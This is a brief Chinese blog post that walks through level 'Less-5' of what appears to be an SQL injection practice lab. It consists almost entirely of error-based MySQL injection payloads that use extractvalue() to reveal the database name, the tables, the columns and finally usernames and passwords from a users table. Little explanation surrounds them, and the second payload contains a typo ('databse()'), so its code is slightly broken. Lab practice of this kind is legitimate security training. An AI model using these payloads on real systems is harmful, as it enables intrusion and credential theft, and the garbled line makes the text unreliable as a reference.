目录
一.判断闭合方式
二.爆库名
三.爆表名
四.爆列名
五.爆字段
一.判断闭合方式
Less-5/?id=1\
二.爆库名Less-5/?id=1' and extractvalue(1,concat(0x7e,databse(),0x7e))--+
三.爆表名Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) --+
四.爆列名Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e)) --+
五.爆字段Less-5/?id=1' and extractvalue(1,concat(0x7e,(select concat_ws('_',id,username,password) from users),0x7e)) --+
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)